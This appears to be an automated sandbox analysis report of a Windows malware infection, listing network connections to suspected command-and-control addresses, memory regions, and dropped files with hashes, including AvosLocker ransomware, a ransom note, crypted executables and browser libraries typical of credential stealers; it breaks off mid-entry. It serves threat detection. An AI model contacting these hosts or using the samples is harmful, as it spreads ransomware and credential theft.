US 52.168.117.173:443 nw-umwatson.events.data.microsoft.com tcp
US 8.8.8.8:53 download.microsoft.com udp
GB 2.18.109.111:443 download.microsoft.com tcp
US 8.8.8.8:53 111.109.18.2.in-addr.arpa udp
US 8.8.8.8:53 gitlab.com udp
US 172.65.251.78:443 gitlab.com tcp
US 104.208.16.94:443 nw-umwatson.events.data.microsoft.com tcp
US 8.8.8.8:53 78.251.65.172.in-addr.arpa udp
NL 91.92.253.107:1334 tcp
US 8.8.8.8:53 94.16.208.104.in-addr.arpa udp
US 104.208.16.94:443 nw-umwatson.events.data.microsoft.com tcp
US 104.208.16.94:443 nw-umwatson.events.data.microsoft.com tcp
US 8.8.8.8:53 nw-umwatson.events.data.microsoft.com udp
US 104.208.16.94:443 nw-umwatson.events.data.microsoft.com tcp
NL 91.92.253.107:1334 tcp
SE 5.42.92.222:7880 tcp
US 8.8.8.8:53 www.pdf-conversa.com udp
DE 217.160.0.68:80 www.pdf-conversa.com tcp
US 8.8.8.8:53 68.0.160.217.in-addr.arpa udp
US 104.208.16.94:443 nw-umwatson.events.data.microsoft.com tcp

Files

memory/2652-0-0x00007FF9FB7D3000-0x00007FF9FB7D5000-memory.dmp

memory/2652-1-0x00000000009A0000-0x00000000009A8000-memory.dmp

memory/2652-2-0x00007FF9FB7D0000-0x00007FF9FC291000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\a\pclient.exe

MD5 54d967f9eb61177beabd0c5c826fd4c6
SHA1 01f797c0cca83c2f23050977a29bde11f336b781
SHA256 5b9481d9022b0efcaed04513d338048de4aa3e1328bacc0966486ef322c0d086
SHA512 a606421bd73cd192a61748ffed9b0be05433ba35b4c7e79fa5a8d811aac6036d61a5c5e803b413ca659c6d8365941e34b0af0409a1a85d4efe6dd97eeea5a111

C:\Users\Admin\AppData\Local\Temp\a\s.exe

MD5 45fb3cd11b294fe8a05691cdab474786
SHA1 cfec8cb59f94b534280f47fcadd68af89107f124
SHA256 b16ef1bdc9bcba0db197bba5bca6fa08ece713de76412e6bea6de5a8dab2af6f
SHA512 e1e26c7706f8d74ae1a0d6d9b1765ee81440746428ea9c6ca9127326dc8fdb2b2419a79109734848978866f52741902f99031b47cb2c9a09427e5a13f51f1f81

C:\Users\Admin\AppData\Local\Temp\a\v.exe

MD5 65208d6a2c36c758bab95b17fb22e19e
SHA1 ef43d4bae09cfeaff0396f339056ac64437cd36e
SHA256 1071d6290a7dd366135a37c2667366e6642d719c34f25a6ed02bba9de9fa99d0
SHA512 23223f7571699ba9e654bad651a9b23876dc286d72676a60d93466cbc6cc7bb7a514686d107dd769526874aac84d8c56fee7e7b54d1cf78cba08a38e8bda9e85

memory/3748-35-0x000000007466E000-0x000000007466F000-memory.dmp

memory/3748-39-0x0000000000C30000-0x0000000000C68000-memory.dmp

memory/3260-38-0x0000000000330000-0x000000000037A000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\a\l.exe

MD5 1c67f687230addd2815b74bc892a047f
SHA1 38f238cad4286ea4ef25d909979b5cd456a7cac5
SHA256 2c0f008432d2604d3578b9ba1f896ecaff4add7d6ece6051f5940de892c26c91
SHA512 1c5cabf89e98a2d87aca4143b93db5dc9b1c0c9c2557052abe888422afc4e79dd9a641122bd0bbb92d13049b5c7fea8014f4945efbf23c5dd33703f99d80f6b0

memory/2880-53-0x0000000000400000-0x0000000000657000-memory.dmp

memory/2372-55-0x0000000000400000-0x0000000000643000-memory.dmp

memory/2880-58-0x0000000000400000-0x0000000000657000-memory.dmp

memory/3428-69-0x0000000000400000-0x0000000000458000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\a\AvosLocker.exe

MD5 8da384b2427b8397a5934182c159c257
SHA1 7bcd2d32a19c1ac7bd014dc9e64b806fdff5f5de
SHA256 f8e99bbacc62b0f72aa12f5f92e35607fa0382a881fe4a4b9476fc6b87a03c78
SHA512 3c4b1736efa48a4897769f12df488e60737523eaffc886ecfbd5b7191f058749bdb4a36feb067e8ca0ef418a7602b3390b6cf465412b88a4ba2fce8a4d670a89

memory/3428-67-0x0000000000400000-0x0000000000458000-memory.dmp

memory/3428-64-0x0000000000400000-0x0000000000458000-memory.dmp

memory/2880-60-0x0000000000400000-0x0000000000657000-memory.dmp

memory/4068-57-0x00000000004E0000-0x0000000000534000-memory.dmp

memory/2372-51-0x0000000000400000-0x0000000000643000-memory.dmp

memory/6824-8768-0x0000000000230000-0x00000000008BE000-memory.dmp

memory/840-15609-0x00000188564E0000-0x0000018856502000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\a\fugu.exe

MD5 bedf1e9ec2eb9267c9fd963418d18688
SHA1 d12ade2952263cf1f56dfa2d29db48a3bad303a2
SHA256 74043f1b65beb765b165993d916ee738bcaa0dab0e4e14bd8c9766519f753864
SHA512 fbe75625aaacbc0d4b96b5f02ded6f27bc5a132990103f12ff9066adb4172743bf05ffe3a8e4eb92479ac3e7def9dcbc3ec27dbe5bac2aeb5491e7d05c921a96

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_34lvgjda.kxu.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

C:\GET_YOUR_FILES_BACK.txt

MD5 01188d22b1675e3437b1418e14f4ffab
SHA1 6e7127f3bbfce49485ed8f1acf8f697bcb952818
SHA256 e4b3ac00a0b2eb195b26abffbc4368077384e73393e51605edda17dae05ab7f2
SHA512 6903ae3247f32ad79c60a2062cd6a7bdbf5a7c9db1bdc43bdbef4da3396945014d30968ea4c8531a2d0c7b695f1ea36e2b8c51bb39cc6157c4096ac04a6e187d

C:\Users\Admin\AppData\Local\Temp\a\66dd9bfe41964_w9.exe

MD5 64034db3a0ce29dcb4cfb658ab805226
SHA1 d4f1cc6d18b4bebcbc89459583e45d5a0456151d
SHA256 61233c38ece219efc52b96189b470aad5dab514eb76231a980b4e80e0928fd1d
SHA512 9b4fe8ba0d6f2e90c84ede2b37629e2a0cdef80007de95c6b34d86aba2aed655e75deea7d85140b9ea517577b489bdd8e7de88683ee8f62529cfabb640d2877f

memory/38448-16860-0x00000000008E0000-0x0000000000952000-memory.dmp

memory/2652-18211-0x00007FF9FB7D3000-0x00007FF9FB7D5000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\a\66dcab0bcba58_crypted.exe

MD5 751e3d161454b4c4aa4cf9ff902ebe1c
SHA1 25ea26e9037576f135a8f950ba47afe70195b2e9
SHA256 7734438b2296ded96633a8f71fdccc2f4fdcff14c933facac7b44007226d3144
SHA512 3e474ea0b0511e8361d80fafc52f0f27f5c8659bc7a40dd31168ea79595c68ab0162295d0fea7b6af4746e4b48279644b93281c094d17c271afe4b4f44029435

memory/6824-22759-0x0000000000230000-0x00000000008BE000-memory.dmp

memory/6824-22751-0x0000000000230000-0x00000000008BE000-memory.dmp

memory/2652-22750-0x00007FF9FB7D0000-0x00007FF9FC291000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 5caad758326454b5788ec35315c4c304
SHA1 3aef8dba8042662a7fcf97e51047dc636b4d4724
SHA256 83e613b6dc8d70e3bb67c58535e014f58f3e8b2921e93b55137d799fc8c56391
SHA512 4e0d443cf81e2f49829b0a458a08294bf1bdc0e38d3a938fb8274eeb637d9a688b14c7999dd6b86a31fcec839a9e8c1a9611ed0bbae8bd59caa9dba1e8253693

memory/26108-22784-0x0000000000E20000-0x0000000000EA4000-memory.dmp

memory/6824-22786-0x0000000000230000-0x00000000008BE000-memory.dmp

memory/6824-22790-0x0000000061E00000-0x0000000061EF3000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

MD5 6cf293cb4d80be23433eecf74ddb5503
SHA1 24fe4752df102c2ef492954d6b046cb5512ad408
SHA256 b1f292b6199aa29c7fafbca007e5f9e3f68edcbbca1965bc828cc92dc0f18bb8
SHA512 0f91e2da0da8794b9797c7b50eb5dfd27bde4546ceb6902a776664ce887dd6f12a0dd8773d612ccc76dfd029cd280778a0f0ae17ce679b3d2ffd968dd7e94a00

memory/6824-22827-0x0000000000230000-0x00000000008BE000-memory.dmp

memory/2880-22831-0x0000000000400000-0x0000000000657000-memory.dmp

memory/2880-22835-0x0000000000400000-0x0000000000657000-memory.dmp

memory/2880-22847-0x00000000052A0000-0x00000000054FF000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\a\66dd2c2d3b88f_opera.exe

MD5 079d166295bafa2ab44902c8bf5ff2a5
SHA1 46e728a035c3fd9618f823a5d0b525a9aa22e1c1
SHA256 dbe5fb6a6d567628f7982723f21869f68508397ee6926116554aef37789014d8
SHA512 949f278bf199553263d7023349b16f6060506e29518886dff77d913df54b951b0c0026667bbd67a9cdc4c44ae7c174d74ddd7d5520df081d91a1296de095151b

memory/2880-22861-0x0000000000400000-0x0000000000657000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\a\66dcad8f5f33a_crypted.exe

MD5 b8010780cbccba9ec2e20d7b3c17c6be
SHA1 30904082c6866796d664f0042780207c5fcf59ba
SHA256 49c25f225e9c5a3ffb651a2ede3505b0faccfbef4f43652d7321388ce6c4b864
SHA512 a98c9acbb1be1802ab2b430fee7aaf0db166ca3dc25b728c6da7535ce884f9dfbef63f45cac55f4ed208630da8f587378ddf5504e5479b85eec62e4d84460205

C:\ProgramData\mozglue.dll

MD5 c8fd9be83bc728cc04beffafc2907fe9
SHA1 95ab9f701e0024cedfbd312bcfe4e726744c4f2e
SHA256 ba06a6ee0b15f5be5c4e67782eec8b521e36c107a329093ec400fe0404eb196a
SHA512 fbb446f4a27ef510e616caad52945d6c9cc1fd063812c41947e579ec2b54df57c6dc46237ded80fca5847f38cbe1747a6c66a13e2c8c19c664a72be35eb8b040

C:\ProgramData\nss3.dll

MD5 1cc453cdf74f31e4d913ff9c10acdde2
SHA1 6e85eae544d6e965f15fa5c39700fa7202f3aafe
SHA256 ac5c92fe6c51cfa742e475215b83b3e11a4379820043263bf50d4068686c6fa5
SHA512 dd9ff4e06b00dc831439bab11c10e9b2ae864ea6e780d3835ea7468818f35439f352ef137da111efcdf2bb6465f6ca486719451bf6cf32c6a4420a56b1d64571

memory/2880-22891-0x0000000000400000-0x0000000000657000-memory.dmp

memory/2880-22907-0x0000000000400000-0x0000000000657000-memory.dmp

C:\ProgramData\CGHCGIIDGDAK\KKFHJJ

MD5 e228c51c082ab10d054c3ddc12f0d34c
SHA1 79b5574c9ce43d2195dcbfaf32015f473dfa4d2e
SHA256 02f65483e90802c728726ce1d16f2b405158f666c36e2c63090e27877ae4e309
SHA512 233ca5e06591e1646edfadb84a31bdfc12632fb73c47240a2109020accfbd1e337371bcc3340eae7a1f04140bbdeb0b416ce2de00fa85671671bb5f6c04aa822

memory/23264-22914-0x0000000000560000-0x00000000005B4000-memory.dmp

memory/23640-22915-0x00007FFA199F0000-0x00007FFA199F2000-memory.dmp

memory/2880-22924-0x0000000000400000-0x0000000000657000-memory.dmp

memory/23640-22916-0x0000000140000000-0x00000001419FB000-memory.dmp

C:\ProgramData\CGHCGIIDGDAK\HDBKJE

MD5 f70aa3fa04f0536280f872ad17973c3d
SHA1 50a7b889329a92de1b272d0ecf5fce87395d3123
SHA256 8d782aa65de6db3538a14da82216e96d5e0a3c60496726e3541a8165bccc65f8
SHA512 30675c5c610d9aa32a4c4a4d9c3af7570823cd197f8d2a709222c78e2cd15304bbed80e233e3674ec2f6e33d1961c67fd6a46dc8ba8b1a301cd0722932c03c84

memory/2880-22943-0x0000000000400000-0x0000000000657000-memory.dmp

C:\ProgramData\vcruntime140.dll

MD5 a37ee36b536409056a86f50e67777dd7
SHA1 1cafa159292aa736fc595fc04e16325b27cd6750
SHA256 8934aaeb65b6e6d253dfe72dea5d65856bd871e989d5d3a2a35edfe867bb4825
SHA512 3a7c260646315cf8c01f44b2ec60974017496bd0d80dd055c7e43b707cadba2d63aab5e0efd435670aa77886ed86368390d42c4017fc433c3c4b9d1c47d0f356

C:\ProgramData\softokn3.dll

MD5 4e52d739c324db8225bd9ab2695f262f
SHA1 71c3da43dc5a0d2a1941e874a6d015a071783889
SHA256 74ebbac956e519e16923abdc5ab8912098a4f64e38ddcb2eae23969f306afe5a
SHA512 2d4168a69082a9192b9248f7331bd806c260478ff817567df54f997d7c3c7d640776131355401e4bdb9744e246c36d658cb24b18de67d8f23f10066e5fe445f6

C:\ProgramData\msvcp140.dll

MD5 5ff1fca37c466d6723ec67be93b51442
SHA1 34cc4e158092083b13d67d6d2bc9e57b798a303b
SHA256 5136a49a682ac8d7f1ce71b211de8688fce42ed57210af087a8e2dbc8a934062
SHA512 4802ef62630c521d83a1d333969593fb00c9b38f82b4d07f70fbd21f495fea9b3f67676064573d2c71c42bc6f701992989742213501b16087bb6110e337c7546

C:\ProgramData\freebl3.dll

MD5 550686c0ee48c386dfcb40199bd076ac
SHA1 ee5134da4d3efcb466081fb6197be5e12a5b22ab
SHA256 edd043f2005dbd5902fc421eabb9472a7266950c5cbaca34e2d590b17d12f5fa
SHA512 0b7f47af883b99f9fbdc08020446b58f2f3fa55292fd9bc78fc967dd35bdd8bd549802722de37668cc89ede61b20359190efbfdf026ae2bdc854f4740a54649e

C:\ProgramData\CGHCGIIDGDAK\JKEHII

MD5 3b93f6244d44cb33dce9bab0d8e93a53
SHA1 d642e65b852bbd2b56ab3332f1ce0e7950b09a69
SHA256 02d40c6f764e46978fb4bd8b324e2f97525c4d3d8b5af7f5054a0edc94e07396
SHA512 fc7ff071bf7fd1269e91af7b7f8ccafb7784b5f722d596a1c067c9ec737e1dfda0e13a5efa222e0c7d1c6589e20e19e6cdfc8a9cc23ca1a6bb7741bb2c158d05

memory/6824-22946-0x0000000000230000-0x00000000008BE000-memory.dmp

memory/2880-22945-0x0000000000400000-0x0000000000657000-memory.dmp

C:\ProgramData\JEGDGIIJJE.exe

MD5 34c7ab92d1a35ce4ba88bc394e2a25f2
SHA1 72cec5d2f3bcd4c72a8bac0824655446220d0cf7
SHA256 2202197b7208d7fc9a9984699081c74721cebd620a6672868ac7948ec2e05476
SHA512 e77e2efa1db8152eb8fdbd5247e6e399930ef77d3dc6fba0cf6098308415292949884f59fc895e3882baa2e333ecd0c55f9d55c043cfa846e3edddfab77076c0

memory/21604-22955-0x0000000000540000-0x00000000009FA000-memory.dmp

C:\Users\Admin\Desktop\GetHide.emf.avos2

MD5 be676ed86a394b4a808d0616dbda8d97
SHA1 82c523f0309524fe356b1e3d0772d89b80ea13c8
SHA256 5f98122b947ffa701006bc452773da695f40e2f3c787a1b78103170a1d235c44
SHA512 b995eb5606f3f114530c442c636e94d8d97595e1b15ca7e628259ef45df0c07e60e02a28df63d864a97be68c2ebf3ed687313cd97014d13cb4468352805335c1

memory/2880-22962-0x0000000000400000-0x0000000000657000-memory.dmp

memory/2880-22970-0x0000000000400000-0x0000000000657000-memory.dmp

memory/21060-22976-0x0000000000750000-0x0000000000C0A000-memory.dmp

memory/21604-22973-0x0000000000540000-0x00000000009FA000-memory.dmp

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad\settings.dat

MD5 ebd1e0c475994371b3998462615f0d05
SHA1 14e355cb59a4e518018b776164c6d0217aca50e8
SHA256 6982055c717bbdaed4aeec95fd9209e1f933093cf5419bc09194366ee80b0541
SHA512 7aa0bc09e0f291418fe3b6683c2e6e83781a2d96af1d36fd47162a132cfb1fe0051135fe401c6f953c85948974aa79343fb88a0d40ed31be7c60249ae21a3a32

memory/20124-23022-0x0000000000AA0000-0x000000000112E000-memory.dmp

memory/19728-23047-0x0000000000260000-0x00000000008EE000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\a\Installer.exe

MD5 dcb050a81038862531cf2e23a095dbd0
SHA1 3340822daaacb341a036a062503db2691f652559
SHA256 3c49e41f4e9be499f026246d0f28a6ee6649ebb12d91ad7ef5a3932a21e5842c
SHA512 5a26a7ae54b08acd2024c16ea7e27a12f4bd5a047d6eef5bf944678faa4c2edc3ca9d6e251107793f908245123ab70d1c73296797cb0c1fb47a265fd4b591cea

memory/19532-23052-0x000001DF1E2C0000-0x000001DF1E5A4000-memory.dmp

memory/20124-23061-0x0000000000AA0000-0x000000000112E000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\1000033001\3ebb97c342.exe

MD5 ef32a1aad76d27f00ee9134721d9b6e8
SHA1 fdfb0262d8cacd567fe03d2e68c1702b32216c8f
SHA256 665a4e8e49ccc2b3b36f58d627acebc6dfe6d3791a81b3b0d9dc9b43d4e98857
SHA512 8e0ce2ace1a4f0c526daec2ab017a7ac50489efdac7bb6d10bfb14a433a72c4fc643530ca619a78725e35621790b8278e350ef1fd94e87c46aa9c00443e87412

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data Kiosk\Crashpad\throttle_store.dat

MD5 9e4e94633b73f4a7680240a0ffd6cd2c
SHA1 e68e02453ce22736169a56fdb59043d33668368f
SHA256 41c91a9c93d76295746a149dce7ebb3b9ee2cb551d84365fff108e59a61cc304
SHA512 193011a756b2368956c71a9a3ae8bc9537d99f52218f124b2e64545eeb5227861d372639052b74d0dd956cb33ca72a9107e069f1ef332b9645044849d14af337

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data Kiosk\Crashpad\settings.dat

MD5 4e8379d5d9aa5bc2433db8fed2d95f9c
SHA1 0573f716394e9de03d5ec71d6122865ddf9c001e
SHA256 b290cd5104a7f6fcf4718beace1a937a452710519ad5a90397eaad591088ba70
SHA512 1242f51706a1f6a98bdebd665c3bc659c86e317909bb025c7ee0c852f6587897c146bd88f1d981079f15ac874b0e105322df2e0ea074ca33b7bf62db1bd68167

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\AAEBAKKJKK.exe.log

MD5 916851e072fbabc4796d8916c5131092
SHA1 d48a602229a690c512d5fdaf4c8d77547a88e7a2
SHA256 7e750c904c43d27c89e55af809a679a96c0bb63fc511006ffbceffc2c7f6fb7d
SHA512 07ce4c881d6c411cac0b62364377e77950797c486804fb10d00555458716e3c47b1efc0d1f37e4cc3b7e6565bb402ca01c7ea8c963f9f9ace941a6e3883d2521

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data Kiosk\Crashpad\settings.dat

MD5 b294047e57e6fdaa62aee0a81c2cb43f
SHA1 d25f879c1db50ffbf8fc15feb2184bb913b4f1b8
SHA256 b81e0f982bc81f1eb081fc7741d8d43b3b90035bd51bf104c6202d8830da02a6
SHA512 389a4bd6e01d6f133cf28f4fc2908543be5559a756469903a9e9b395f2d1d27456cb4a6622e0fae0c61c8f89239cab0d3a750dc893c421917ca2b72898979c24

memory/21060-23113-0x0000000000750000-0x0000000000C0A000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\a\66d9f685932be_uninstaller.exe

MD5 fdf999d19df6b5c6a03bdbe1990347b3
SHA1 3266aa1f4ee746d69601c42afcda7666efd08ea2
SHA256 7a15dd944f05b7280ae9d297f7707f5ee712821fbae770930bae1539cf9e0b4e
SHA512 3232b2b0e373104b0f3d31d0275e0d40d247abd3b3fc288cc75d29ed26161726d31728f7ac25a771b277f74fe9a274346820f7087596caf6184ea7c7ce340274

C:\Users\Admin\AppData\Local\Temp\edge_shutdown_crash.txt

MD5 06d49632c9dc9bcb62aeaef99612ba6b
SHA1 e91fe173f59b063d620a934ce1a010f2b114c1f3
SHA256 e79e418e48623569d75e2a7b09ae88ed9b77b126a445b9ff9dc6989a08efa079
SHA512 849b2f3f63322343fddc5a3c8da8f07e4034ee4d5eb210a5ad9db9e33b6aec18dea81836a87f9226a4636c6c77893b0bd3408f6d1fe225bb0907c556a8111355

memory/15928-23128-0x0000000000400000-0x0000000000452000-memory.dmp

memory/21060-23127-0x0000000000750000-0x0000000000C0A000-memory.dmp

memory/15928-23132-0x0000000005740000-0x00000000057D2000-memory.dmp

memory/15928-23130-0x0000000005C50000-0x00000000061F4000-memory.dmp

memory/15928-23134-0x0000000005730000-0x000000000573A000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\TmpD8A8.tmp

MD5 1420d30f964eac2c85b2ccfe968eebce
SHA1 bdf9a6876578a3e38079c4f8cf5d6c79687ad750
SHA256 f3327793e3fd1f3f9a93f58d033ed89ce832443e2695beca9f2b04adba049ed9
SHA512 6fcb6ce148e1e246d6805502d4914595957061946751656567a5013d96033dd1769a22a87c45821e7542cde533450e41182cee898cd2ccf911c91bc4822371a8

memory/15928-23151-0x0000000006380000-0x00000000063F6000-memory.dmp

memory/15928-23154-0x0000000006B00000-0x0000000006B1E000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\a\66d9f6e9330e4_deep.exe

MD5 6a94b94ba557d5d85a1da20213d48974
SHA1 a311aa3a9243849b883867fa3d772e4c4e95d080
SHA256 e4a125aa374a939c07ee3172dd5cdb23990096efe7059e9d647f1eaadc32e3dd
SHA512 a246f8f4341a144f4946179c518fea833dbec7e40c69023e10687f85d97c28e1851334f20260069c0d6500ecb859c2e2553b4492cda22c6145966bc893a54c74

memory/15928-23164-0x0000000006BD0000-0x0000000006BE2000-memory.dmp

memory/15928-23166-0x0000000006DA0000-0x0000000006DEC000-memory.dmp

memory/15328-23169-0x000002629AF70000-0x000002629AFAC000-memory.dmp

memory/15328-23168-0x0000026282720000-0x0000026282732000-memory.dmp

memory/15328-23167-0x00000262826B0000-0x00000262826CE000-memory.dmp

memory/15928-23165-0x0000000006C30000-0x0000000006C6C000-memory.dmp

memory/15928-23163-0x0000000006C90000-0x0000000006D9A000-memory.dmp

memory/15928-23162-0x0000000007140000-0x0000000007758000-memory.dmp

memory/13336-23179-0x0000000140000000-0x000000014000E000-memory.dmp

memory/13336-23178-0x0000000140000000-0x000000014000E000-memory.dmp

memory/13336-23177-0x0000000140000000-0x000000014000E000-memory.dmp

memory/19728-23198-0x0000000000260000-0x00000000008EE000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data Kiosk\Crashpad\metadata

MD5 4e7521beb1ffe91d22551b0488a96c6c
SHA1 82ad3588f9ae5e9012458b6ce7b66fea0a272734
SHA256 eb30c3e85fc9e3a848d52c6d21ce8696eca4422c0eb19c185f6c514873c47fa7
SHA512 7789e30bb39d4e8fb05e364ec048c6ffcdd9286ec86d6bf86e8f6e577025a5613601eefe735bc53e7043ed433de75ace05f46326eeb3aca800b2c7cd9a076f1b

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data Kiosk\Crashpad\reports\aa1b87ef-357b-48c3-a384-1d0967da554a.dmp

MD5 3d609a3749c1550ec824ad4391da4c7b
SHA1 275ba208bc81673b11ced03df0181c542c5bbba3
SHA256 811803409dc81f578777615ebd39c0cade3bf0fc234e04aa6604446178fe1997
SHA512 562959d1634f46351a047244f50b47a0dc0f906c171243725422e2e8d0e16617fb8bc504965e2dabcb274f98ec894a84ab5b50eba5d989d383e4a0f6c416f782

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data Kiosk\Crashpad\watson_metadata

MD5 13b739e31979f1d1680bc1c75b95101d
SHA1 861403baa82e9fa7a6f2901504486e252a01dacd
SHA256 e445cc56f5c47ed2d1da66c58a4446ac002db069163ba9ef873cda1567be97a6
SHA512 f541d9c6ef9fbdda577422e208c3ff7c7444aaba9c15818fe4b7df22ab0f571d6666ab5b264ead6f709cab1ffb478aec43637b2658c5d6f5ce316109e2de89db

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data Kiosk\Crashpad\metadata

MD5 ab69cc1475aab17afdfbad6e9c47765d
SHA1 a3c3cc9c075ad509c519a9d072910224b4873ebb
SHA256 15764cd4b081c7f9615b4c424ffae9f33c8c31999d278bd68e572f8cdf15ae56
SHA512 a2711df04db532a6937bc990beebb1754a121017d4343dedb3b217f9fa4d375e2bc1497609f45d2a62471c3cd6ebeac510125b7ee8d840d8afe690901b7863c7

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data Kiosk\Crashpad\reports\ec10c213-ebc5-41cc-bd59-4eed611dd295.dmp

MD5 118deea38a6032a9f55427d8765361db
SHA1 a609af986805b836ac57ec7f6b12e33e1ecf6939
SHA256 4e00f054109e0006b011910e54a3051d77d6644b8d73b8f39b589e4d42fc5cc8
SHA512 331059c475f2977016cf8dd97701f7e7cc736b96c402e16848b5f226eb6339945baec05f6d21349757d27e57c3a1075d2dc958c0fd8c90a67c4ea3779ac80ac0

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data Kiosk\Crashpad\metadata

MD5 aadaa79ae0d07ee9e1e05f2b8e1128ca
SHA1 949e8c49510f59f209c09ebecbb56617c9dff1c8
SHA256 c984fbb3678e06cb682dde5efeabddb85c50275257066da064587db2a0ef7fb3
SHA512 ab46d8b3ab191b8922c6121508526db0ff50e363f77f8e050262d0c855643db432fa9c7567fd59bb1a37d36d7e27c94c70e484c49b0b2aaf3c0ca473ece10274

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data Kiosk\Crashpad\reports\55e5fd4d-1bc1-4ad4-8444-c4ab4ab6fa70.dmp

MD5 6f26608df6a4afa078e8bc2eab72934c
SHA1 a025fd00e26dde0541b1f9e50b021a67433c8964
SHA256 8c8c875d8d63e64da54a4d9de44436f50e9cfc7fb0eafeabbb87d5cb20572b61
SHA512 79ae7db1422b01deae38d445be693982f8246a0b29e07f8410a27542835a96e1759d630bc9f59ea0b4c99aacbd010a5d191017a46813264e5e8ff9d84d6ea2e4

C:\ProgramData\JJDBAAEGDBKK\CAKKJK

MD5 a182561a527f929489bf4b8f74f65cd7
SHA1 8cd6866594759711ea1836e86a5b7ca64ee8911f
SHA256 42aad7886965428a941508b776a666a4450eb658cb90e80fae1e7457fc71f914
SHA512 9bc3bf5a82f6f057e873adebd5b7a4c64adef966537ab9c565fe7c4bb3582e2e485ff993d5ab8a6002363231958fabd0933b48811371b8c155eaa74592b66558

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data Kiosk\Crashpad\metadata

MD5 3378935712e8c1cd4a3cd73395ce68c9
SHA1 8292248dca12838830955320b0021cd4ce5f5453
SHA256 958ee6ba7c1dab6a313edf778f496b01ff1d32bf0b70eb228334d76c22493a87
SHA512 1257742bd4aae45eaee995feef6de2c18eddb7df39718f74018d6d21e095d399295c47efb3de6556669bed036b570656c689cc6718dd04549f6634ce29b4b4f8

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data Kiosk\Crashpad\reports\456e97f3-a6cd-4061-b263-432d44e6a351.dmp

MD5 cc574fcfb0d651a647b365d654c7d02a
SHA1 d26e3ebda76d79b77427acf1554d44552695cc45
SHA256 a264ac16ede5af9b74693ba89d9636ae0e8adc54d6b2081b2b8ba9e2b198c453
SHA512 da2abb5e5087a19167b4ce141b90ec9e478c1e52f05f5938b72238648cb886a7efe826643da1d8c3d41dc0cc600f35c75305170b35444f8ce07484b7bc40c8ac

C:\ProgramData\JJDBAAEGDBKK\IDAEBG

MD5 f310cf1ff562ae14449e0167a3e1fe46
SHA1 85c58afa9049467031c6c2b17f5c12ca73bb2788
SHA256 e187946249cd390a3c1cf5d4e3b0d8f554f9acdc416bf4e7111fff217bb08855
SHA512 1196371de08c964268c44103ccaed530bda6a145df98e0f480d8ee5ad58cb6fb33ca4c9195a52181fe864726dcf52e6a7a466d693af0cda43400a3a7ef125fad

C:\ProgramData\JJDBAAEGDBKK\IDAEBG

MD5 a603e09d617fea7517059b4924b1df93
SHA1 31d66e1496e0229c6a312f8be05da3f813b3fa9e
SHA256 ccd15f9c7a997ae2b5320ea856c7efc54b5055254d41a443d21a60c39c565cb7
SHA512 eadb844a84f8a660c578a2f8e65ebcb9e0b9ab67422be957f35492ff870825a4b363f96fd1c546eaacfd518f6812fcf57268ef03c149e5b1a7af145c7100e2cc

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data Kiosk\Crashpad\reports\55af97d2-e0ae-4471-8c6f-217b2f509859.dmp

MD5 ab1ac515e47b7322a005a1756a8d8671
SHA1 e88be915f484695572bdd4de0c706a328d27766c
SHA256 58340a0e9d03cd27882d62367fdbdcc04f9bb0438d86e88dc8eafdd3d040a98f
SHA512 3a9221693410eaf1ad9388b0208060fdf9009cd7bc9db4f9cf76c7376abd9ae09a4c6ef6a759ddbdee611428c4bc55709222f039c50e4b55e26b1ef3daec315e

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data Kiosk\Crashpad\metadata

MD5 6a15a6fac1988531bd322acfc95f7732
SHA1 c7fce77d9ef972797eabf08bd6893abfa0565c63
SHA256 30c83c1e2f76fa1186d14943d3bb716bf381069b80a4aa5eb191d10ad7cb8e00
SHA512 c20c00b84d29c00319747b57351294b261f0decb8a5dfefb4a53bd46e54fcde868e67df15fee06eb41c30281bca89160de8111b5963a3a8e7ffb2d6077369c7c

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data Kiosk\Crashpad\metadata

MD5 3cbd2ce34cf8e4084f7aea003aa3f933
SHA1 2aebd8b6836c03b22c3bb802fc4707b9e84e0926
SHA256 a06bbdaf75ce8fb0e1649e8b97abe58699336711c58fbba1d2616b0a96642876
SHA512 b36577bf92db6a785a16e4cc802b2fadaa23b9e4198b689b90830ae338e9ea2b068cd1ab786f793aad14b0738dac3eef27d8860f562c19e3e0ec33e1289d4ed6

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data Kiosk\Crashpad\reports\97d7bdac-2a38-4a41-ab81-8fd60e0ef17e.dmp

MD5 869054d2c11e6b1990dddd1d3661cff0
